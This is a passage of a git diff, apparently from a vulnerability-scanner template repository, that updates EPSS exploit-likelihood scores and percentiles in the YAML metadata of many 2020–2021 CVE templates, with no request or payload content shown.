a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-7943 cwe-id: CWE-276,NVD-CWE-noinfo epss-score: 0.65366 - epss-percentile: 0.98423 + epss-percentile: 0.98426 cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 981109b517d..7df2a4e361a 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-7980 cwe-id: CWE-78 epss-score: 0.93932 - epss-percentile: 0.99872 + epss-percentile: 0.99871 cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 2b018152a78..bece84a2156 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8115 cwe-id: CWE-79 epss-score: 0.55788 - epss-percentile: 0.98007 + epss-percentile: 0.98005 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 0c9356c1796..3e99b109532 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-8163 cwe-id: CWE-94 epss-score: 0.90927 - epss-percentile: 0.99614 + epss-percentile: 0.99612 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index fcd43777a92..512d3423163 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-8191 cwe-id: CWE-79 epss-score: 0.91043 - epss-percentile: 0.99619 + epss-percentile: 0.99618 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 2d1a4646957..db525bda7b2 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8194 cwe-id: CWE-94 epss-score: 0.81139 - epss-percentile: 0.99121 + epss-percentile: 0.99123 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 9089911027c..e1fab448ac8 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8644 cwe-id: CWE-94 epss-score: 0.92716 - epss-percentile: 0.9974 + epss-percentile: 0.99738 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index c73cccb436e..295cc1c69fa 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8654 cwe-id: CWE-78 epss-score: 0.91205 - epss-percentile: 0.99631 + epss-percentile: 0.99629 cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8657.yaml b/http/cves/2020/CVE-2020-8657.yaml index 3fd0ecba4d7..40450d296b8 100644 --- a/http/cves/2020/CVE-2020-8657.yaml +++ b/http/cves/2020/CVE-2020-8657.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2020-8657 epss-score: 0.86393 - epss-percentile: 0.99382 + epss-percentile: 0.99384 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-798 diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index 70d1d3a80e1..5de1a686901 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8771 cwe-id: CWE-287 epss-score: 0.81044 - epss-percentile: 0.99115 + epss-percentile: 0.99116 cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index 159db9fe979..e5802a20b5b 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8772 cwe-id: CWE-862 epss-score: 0.93091 - epss-percentile: 0.99777 + epss-percentile: 0.99776 cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 587db31c276..582504852c1 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8813 cwe-id: CWE-78 epss-score: 0.94067 - epss-percentile: 0.99898 + epss-percentile: 0.99896 cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index a4c67c07ca6..fb4cb1718a4 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-9036 cwe-id: CWE-79 epss-score: 0.2618 - epss-percentile: 0.96134 + epss-percentile: 0.96138 cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index 82f266f63cf..b45b0cda07a 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-9043 cwe-id: CWE-200 epss-score: 0.29554 - epss-percentile: 0.9647 + epss-percentile: 0.96475 cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 57256f51783..7693370dfcb 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-9344 cwe-id: CWE-79 epss-score: 0.36969 - epss-percentile: 0.97026 + epss-percentile: 0.97025 cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 39a64730d02..02c116cdbe1 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-9425 cwe-id: CWE-670 epss-score: 0.49449 - epss-percentile: 0.97702 + epss-percentile: 0.97697 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index 18ef3fc9e3d..fdf6db50e30 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-9483 cwe-id: CWE-89 epss-score: 0.93816 - epss-percentile: 0.99853 + epss-percentile: 0.99852 cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index 573378402ed..d800b84fb55 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -27,7 +27,7 @@ info: cve-id: CVE-2020-9484 cwe-id: CWE-502 epss-score: 0.93325 - epss-percentile: 0.99799 + epss-percentile: 0.99798 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9547.yaml b/http/cves/2020/CVE-2020-9547.yaml index 41e64f56f51..b048352e3e4 100644 --- a/http/cves/2020/CVE-2020-9547.yaml +++ b/http/cves/2020/CVE-2020-9547.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-9547 cwe-id: CWE-502 epss-score: 0.43143 - epss-percentile: 0.97383 + epss-percentile: 0.9738 cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 758374b722c..84a7a97ead4 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-1472 cwe-id: CWE-287,CWE-119 epss-score: 0.87334 - epss-percentile: 0.99428 + epss-percentile: 0.9943 cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index 3d7a03797b9..89dadab359e 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2021-1497 cwe-id: CWE-78 epss-score: 0.94396 - epss-percentile: 0.99972 + epss-percentile: 0.99971 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 758d9091869..f078289a2c2 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2021-1498 cwe-id: CWE-78 epss-score: 0.94012 - epss-percentile: 0.99887 + epss-percentile: 0.99886 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index aaa669d7ba6..b89987a9567 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-1499 cwe-id: CWE-306 epss-score: 0.9197 - epss-percentile: 0.99682 + epss-percentile: 0.99681 cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 27d5660cdc9..153332b3081 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-20031 cwe-id: CWE-601 epss-score: 0.36219 - epss-percentile: 0.96975 + epss-percentile: 0.96973 cpe: cpe:2.3:h:sonicwall:nsa_2650:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 8af3cd43abd..36855762674 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-20114 cwe-id: CWE-425 epss-score: 0.53868 - epss-percentile: 0.97915 + epss-percentile: 0.97912 cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index d4d1e797f02..fcb84d6ce5a 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-20137 cwe-id: CWE-79 epss-score: 0.11461 - epss-percentile: 0.93394 + epss-percentile: 0.93388 cpe: cpe:2.3:h:gryphonconnect:gryphon_tower:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 1085fb157bc..b8ecf75ca6c 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-20150 cwe-id: CWE-306 - epss-score: 0.35186 - epss-percentile: 0.96907 + epss-score: 0.41622 + epss-percentile: 0.97295 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index a39b1884065..22bf33b0052 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20158 cwe-id: CWE-306 - epss-score: 0.8034 - epss-percentile: 0.9908 + epss-score: 0.82597 + epss-percentile: 0.99203 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 223e370cfbf..40010ce7799 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8 cve-id: CVE-2021-20167 cwe-id: CWE-77 - epss-score: 0.79422 - epss-percentile: 0.99036 + epss-score: 0.81815 + epss-percentile: 0.9916 cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 657cc734668..4a35685417e 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2021-20323 cwe-id: CWE-79 epss-score: 0.66054 - epss-percentile: 0.98456 + epss-percentile: 0.98458 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20617.yaml b/http/cves/2021/CVE-2021-20617.yaml index b2f2a5a1208..07f358ef8cc 100644 --- a/http/cves/2021/CVE-2021-20617.yaml +++ b/http/cves/2021/CVE-2021-20617.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20617 - epss-score: 0.34455 - epss-percentile: 0.96862 + epss-score: 0.53706 + epss-percentile: 0.97904 cwe-id: NVD-CWE-Other cpe: cpe:2.3:a:acmailer:acmailer:*:*:*:*:*:*:*:*,cpe:2.3:a:acmailer:acmailer_db:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 7366fbdd07a..3dc78a7df0f 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20792 cwe-id: CWE-79 - epss-score: 0.09715 - epss-percentile: 0.92697 + epss-score: 0.09536 + epss-percentile: 0.92599 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 572cb5d16ea..f197a74a299 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-21087 cwe-id: CWE-79 - epss-score: 0.81792 - epss-percentile: 0.99157 + epss-score: 0.84201 + epss-percentile: 0.99283 cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: max-request: 7 diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 19b9a6bd964..dd401982939 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2021-21234 cwe-id: CWE-22 epss-score: 0.93852 - epss-percentile: 0.9986 + epss-percentile: 0.99859 cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 925d90c4457..96b114176aa 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-21287 cwe-id: CWE-918 epss-score: 0.91999 - epss-percentile: 0.99685 + epss-percentile: 0.99684 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index eb4c53a67d5..f527a9e4398 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-21345 cwe-id: CWE-78,CWE-502 epss-score: 0.87079 - epss-percentile: 0.99416 + epss-percentile: 0.99418 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-2135.yaml b/http/cves/2021/CVE-2021-2135.yaml index 675a7049572..fe674b723af 100644 --- a/http/cves/2021/CVE-2021-2135.yaml +++ b/http/cves/2021/CVE-2021-2135.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-2135 epss-score: 0.71821 - epss-percentile: 0.98689 + epss-percentile: 0.98688 cwe-id: CWE-502 cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 6dc43d47889..fcef79ba9f7 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-21745 cwe-id: CWE-352 epss-score: 0.40585 - epss-percentile: 0.97235 + epss-percentile: 0.97234 cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 8dcf9d2372a..21d3be860d0 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-21801 cwe-id: CWE-79 epss-score: 0.84598 - epss-percentile: 0.99299 + epss-percentile: 0.99298 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index d2b83e10650..eda1e828c21 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-21802 cwe-id: CWE-79 epss-score: 0.66834 - epss-percentile: 0.98489 + epss-percentile: 0.98491 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index 503ccbf9895..d5ae6f94396 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-21816 cwe-id: CWE-200 epss-score: 0.77268 - epss-percentile: 0.98928 + epss-percentile: 0.98927 cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index 5d56c09a6fd..abd888eff2b 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-21972 cwe-id: CWE-22 epss-score: 0.93821 - epss-percentile: 0.99855 + epss-percentile: 0.99854 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 057c56dae3f..8abf2dced00 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2021-21978 cwe-id: CWE-20 epss-score: 0.90903 - epss-percentile: 0.99611 + epss-percentile: 0.9961 cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index 49b7e53f9b1..2f44b863239 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-21985 cwe-id: CWE-20 epss-score: 0.94412 - epss-percentile: 0.99977 + epss-percentile: 0.99975 cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 8e86004196d..594cbdb7dbf 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-22054 cwe-id: CWE-918 - epss-score: 0.84417 - epss-percentile: 0.99292 + epss-score: 0.88929 + epss-percentile: 0.99504 cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 9da138bd60e..8d36cef123c 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-22122 cwe-id: CWE-79 - epss-score: 0.52697 - epss-percentile: 0.97848 + epss-score: 0.57842 + epss-percentile: 0.98094 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index f5cc5c9021b..517d6e4da2f 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-22145 cwe-id: CWE-209 - epss-score: 0.65695 - epss-percentile: 0.9844 + epss-score: 0.67928 + epss-percentile: 0.98531 cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 36346da2ca9..1b39d0f5104 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-23241 cwe-id: CWE-22 epss-score: 0.62713 - epss-percentile: 0.9831 + epss-percentile: 0.98311 cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index e12dc19f28c..dd37421e3cf 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24146 cwe-id: CWE-862,CWE-284 epss-score: 0.6415 - epss-percentile: 0.98374 + epss-percentile: 0.98375 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index 75cfd38da4e..fb3a987c71d 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24150 cwe-id: CWE-918 epss-score: 0.41724 - epss-percentile: 0.97303 + epss-percentile: 0.97301 cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index 435caf47e69..4dcbc16abbe 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24165 cwe-id: CWE-601 epss-score: 0.01173 - epss-percentile: 0.78265 + epss-percentile: 0.7826 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index ea23c3448e7..d233378f0e9 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24169 cwe-id: CWE-79 epss-score: 0.05053 - epss-percentile: 0.89458 + epss-percentile: 0.89456 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24170.yaml b/http/cves/2021/CVE-2021-24170.yaml index 732a9221f21..2c2da815f1d 100644 --- a/http/cves/2021/CVE-2021-24170.yaml +++ b/http/cves/2021/CVE-2021-24170.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24170 cwe-id: CWE-200 epss-score: 0.28674 - epss-percentile: 0.96394 + epss-percentile: 0.96397 cpe: cpe:2.3:a:cozmoslabs:user_profile_picture:*:*:*:*:*:wordpress:*:* metadata: vendor: cozmoslabs diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index dde00c55e60..9d5657d1df6 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24176 cwe-id: CWE-79 epss-score: 0.21335 - epss-percentile: 0.95511 + epss-percentile: 0.95514 cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 41c4750b54d..ab10ee023a0 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24210 cwe-id: CWE-601 epss-score: 0.11853 - epss-percentile: 0.93518 + epss-percentile: 0.93511 cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24212.yaml b/http/cves/2021/CVE-2021-24212.yaml index 1b99a5d28aa..d6352b89844 100644 --- a/http/cves/2021/CVE-2021-24212.yaml +++ b/http/cves/2021/CVE-2021-24212.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24212 cwe-id: CWE-434 epss-score: 0.68228 - epss-percentile: 0.9854 + epss-percentile: 0.98542 metadata: verified: false max-request: 2 diff --git a/http/cves/2021/CVE-2021-24213.yaml b/http/cves/2021/CVE-2021-24213.yaml index a08b846ea09..2b9228d474c 100644 --- a/http/cves/2021/CVE-2021-24213.yaml +++ b/http/cves/2021/CVE-2021-24213.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: 